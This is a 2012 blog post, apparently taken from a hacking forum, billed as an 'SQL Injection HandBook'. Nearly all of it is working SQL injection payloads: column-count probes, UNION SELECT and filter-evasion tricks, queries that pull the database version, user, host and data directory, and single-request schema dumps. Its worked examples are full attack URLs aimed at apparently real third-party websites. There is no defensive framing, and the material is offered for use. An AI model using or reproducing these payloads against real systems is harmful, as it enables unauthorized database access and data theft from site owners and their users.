sql advance

Monday, November 5, 2012



HI HF this is my SQL Injection HandBook and I love to share it with who like sql injection

OK let's start with my HandBook 

Order By - get column count - method

Integer Injection method

Spoiler (Click to Hide)

+Order+By+100 --

+Group+by+99 --

+Order+By+119449 --

+Group+by+119449 --

+order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5​7,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,​84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99

String Injection method

Spoiler (Click to Hide)

--'- : +--+ / : -- - : --+- : /*

) order by 1-- -

') order by 1-- -

')order by 1%23%23

%')order by 1%23%23

Null' order by 100--+

Null' order by 9999--+

')group by 99-- -

'group by 119449-- -

'group/**/by/**/99%23%23

PHP Code:
'+order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,​29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55​,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,8​2,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99 +--+ 

☆¸.•*☆ ☆*•.¸☆

union select ByPassing method 

Spoiler (Click to Hide)

PHP Code:
+union+distinct+select+

+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/
+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+

+/*!u%6eion*/+/*!se%6cect*/+
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23

/*!50000%55nIoN*/+/*!50000%53eLeCt*/

union /*!50000%53elect*/

%55nion %53elect 

PHP Code:
+--+Union+--+Select+--+ 

PHP Code:
+UnIoN/*&a=*/SeLeCT/*&a=*/
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only

id=1+'UnI'||'on'+SeLeCT' <-MSSQL only

UnIoN SeLeCt CoNcAt(version())--
uNiOn aLl sElEcT

uUNIONnion all sSELECTelect 

☆¸.•*☆ ☆*•.¸☆

:: Buffer Overflow ::

Spoiler (Click to Hide)

+And(select 1)=(select 0x414)+union+select+1--

+And(select 1)=(select 0xAAAA)+union+select+1--

PHP Code:
+And(select 1)=(select 0x4141414141414141414141414141414141414141414141414141414141414141414141414​14141414141414141414141414141414141414141414141414141414141414141414141414141414​14141414141414141414141414141414141414141414141414141414141414141414141414141414​14141414141414141414141414141414141414141414141414141414141414141414141414141414​14141414141414141414141414141414141414141414141414141414141414141414141414141414​14141414141414141414141414141414141414141414141414141414141414141414141414141414​14141414141414141414141414141414141414141414141414141414141414141414141414141414​14141414141414141414141414141414141414141414141414141414141414141414141414141414​14141414141414141414141414141414141414141414141414141414141414141414141414141414​1414141)+ 

PHP Code:
+and (/*!select*/ 1)=(/*!select*/ 0xAA)+ 

☆¸.•*☆ ☆*•.¸☆

:: 400 Bad Request ::

Spoiler (Click to Hide)

--+%0A

PHP Code:
union+select+1--+%0A,2--+%0A,3--+%0A,4--+%0A,5--+%0A -- 

☆¸.•*☆ ☆*•.¸☆

null the parameter

Spoiler (Click to Hide)

id=-1

id=null

id=1+and+false+

id=9999

id=1 and 0

id==1

id=(-1)

☆¸.•*☆ ☆*•.¸☆

Group_Concat

Spoiler (Click to Hide)

PHP Code:
Group_Concat

group_concat()
/*!group_concat*/()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29 

PHP Code:
CoNcAt()
CONCAT(DISTINCT Version())
concat(,0x3a,)
concat%00()

%00CoNcAt()
/*!50000cOnCat*/(/*!Version()*/)
/*!50000cOnCat*/

/**//*!12345cOnCat*/(,0x3a,) 

PHP Code:
concat_ws()
concat(0x3a,,0x3c62723e)
/*!concat_ws(0x3a,)*/
concat_ws(0x3a3a3a,version()
CONCAT_WS(CHAR(32,58,32),version(),) 

PHP Code:
REVERSE(tacnoc)
binary(version())
uncompress(compress(version()))
aes_decrypt(aes_encrypt(version(),1),1

☆¸.•*☆ ☆*•.¸☆

To appear column numbr in page put after id

Spoiler (Click to Hide)

id=1+and+1=0+union+select+1,2,3,4,5,6

+AND+1=0

/*!aND*/ 1 like 0

+/*!and*/+1=0

+and+2>3+

+and(1)=(0)

and (1)!=(0)

+div+0

Having+1=0

☆¸.•*☆ ☆*•.¸☆

function ByPassing

Spoiler (Click to Hide)

PHP Code:
unhex(hex(value)) 

PHP Code:
cast(value as char

PHP Code:
uncompress(compress(version())) 

PHP Code:
cast(version() as char

PHP Code:
aes_decrypt(aes_encrypt(version(),1),1

PHP Code:
binary(version()) 

convert(value using ascii)

'ascii' dosent work? you can try

PHP Code:
ujis

ucs2

tis620

swe7

sjis

macroman

macce

latin7

latin5

latin2

koi8u

koi8r

keybcs2

hp8

geostd8

gbk

gb2132

armscii8

ascii

cp1250

big5

cp1251

cp1256

cp1257

cp850

cp852

cp866

cp932

dec8

euckr

latin1

utf8 

☆¸.•*☆ ☆*•.¸☆

avoid source page injection

Spoiler (Click to Hide)

concat(?">,<br><br><br>,@@version,?<img src=",?<?'#)

"><br>? <img src="

<img src=''''/>injection<img src=''

PHP Code:
concat(0x223e,@@version)
concat(0x273e27,version(),0x3c212d2d)
concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
concat(0x223e,@@version,0x3c696d67207372633d22

PHP Code:
concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c​62723e

PHP Code:
concat(0x223e3c62723e,@@version,0x3a,"BlackRose",0x3c696d67207372633d22

concat('</title>',@@version,'<title>')

PHP Code:
concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27

☆¸.•*☆ ☆*•.¸☆

get version - DB_NAME - user - HOST_NAME - datadir

Spoiler (Click to Hide)

version()

convert(version() using latin1)

unhex(hex(version()))

@@GLOBAL.VERSION

(substr(@@version,1,1)=5) :: 1 true 0 fals

# like #

PHP Code:
www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,-- 

1 it's mean version 5 and 0 mean version 4

☆¸.•*☆ ☆*•.¸☆

+and substring(version(),1,1)=4

+and substring(version(),1,1)=5

+and substring(version(),1,1)=9

+and substring(version(),1,1)=10

# like #

PHP Code:
www.marinaplast.com/page.php?id=13+and substring(version(),1,1)=

download good version 5

PHP Code:
www.marinaplast.com/page.php?id=13+and substring(version(),1,1)=

not download good version 4

☆¸.•*☆ ☆*•.¸☆

version 5

id=1 /*!50094aaaa*/ error

id=1 /*!50095aaaa*/ no error

id=1 /*!50096aaaa*/ error

# like #

PHP Code:
www.marinaplast.com/page.php?id=13 /*!50095aaaa*/  no error v5 

☆¸.•*☆ ☆*•.¸☆

version 4

id=1 /*!40123 1=1*/--+- no error

id=1 /*!40122rrrr*/ no error

# like #

PHP Code:
www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4 

☆¸.•*☆ ☆*•.¸☆

DB_NAME()

@@database

database()

id=vv()

# like #

PHP Code:
www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,-- 

PHP Code:
www.marinaplast.com/page.php?id=vv() 

☆¸.•*☆ ☆*•.¸☆

@@user

user()

user_name()

system_user()

# like #

PHP Code:
www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,-- 

☆¸.•*☆ ☆*•.¸☆

HOST_NAME()

@@hostname

@@servername

SERVERPROPERTY()

# like #

PHP Code:
www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,-- 

☆¸.•*☆ ☆*•.¸☆

@@datadir

datadir()

# like #

PHP Code:
www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,-- 

☆¸.•*☆ ☆*•.¸☆

ASPX

and 1=0/@@version

' and 1=0/@@version;--

') and 1=@@version--

and 1=0/user;--

☆¸.•*☆ ☆*•.¸☆

Requested method

#1#

[DUMP DB in 1 Request]

Spoiler (Click to Hide)

PHP Code:
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columnswhere (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x

PHP Code:
(select(@) from (select (@:=0x00),(select (@) from (tablewhere (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a

☆¸.•*☆ ☆*•.¸☆

[DUMP DB in 1 Request improve]

Spoiler (Click to Hide)

PHP Code:
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x

like

PHP Code:
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.colu​mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=c​oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 -- 

☆¸.•*☆ ☆*•.¸☆

#2#

method like DUMP DB in 1 Request

Spoiler (Click to Hide)

PHP Code:
concat(@i:=0x00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_nameFROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))) 

like

PHP Code:
http://www.mishnetorah.com/shop/details.php?id=-26+union+select+1,2,3,concat(@i:=0x00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a​,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21 

☆¸.•*☆ ☆*•.¸☆

#3#

How to know count of databases & tables & columns 

Spoiler (Click to Hide)

databases

PHP Code:
(select+count(schema_name) +from+information_schema.schemata

# like # 

PHP Code:
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 -- 

tables

PHP Code:
(select+count(table_name) +from+information_schema.tables

# like # 

PHP Code:
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 -- 

columns

PHP Code:
(select+count(column_name) +from+information_schema.columns

# like # 

PHP Code:
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 -- 

☆¸.•*☆ ☆*•.¸☆

#4#

show the table with all her columns

Spoiler (Click to Hide)

PHP Code:
CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))

+FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1--+ 

like

PHP Code:
www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,+FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1--+ 

# play with limit #

☆¸.•*☆ ☆*•.¸☆

#5#

feltered requested

# tables #

Spoiler (Click to Hide)

PHP Code:
group_concat(/*!table_name*/

PHP Code:
+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES-- - 

or

PHP Code:
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- - 

PHP Code:
/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()-- - 

# columns #

Spoiler (Click to Hide)

PHP Code:
group_concat(/*!column_name*/

PHP Code:
+/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table 

PHP Code:
/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table 

/*!froM*/ table-- -

☆¸.•*☆ ☆*•.¸☆

#6#

bypass method

Spoiler (Click to Hide)

PHP Code:
(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()) 

PHP Code:
(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table

like

PHP Code:
www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,-- 

☆¸.•*☆ ☆*•.¸☆

#7#

bypass method

Spoiler (Click to Hide)

PHP Code:
unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))) 

PHP Code:
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037

like

PHP Code:
www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)-- 

Posted by Unknown at 6:25 PM

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)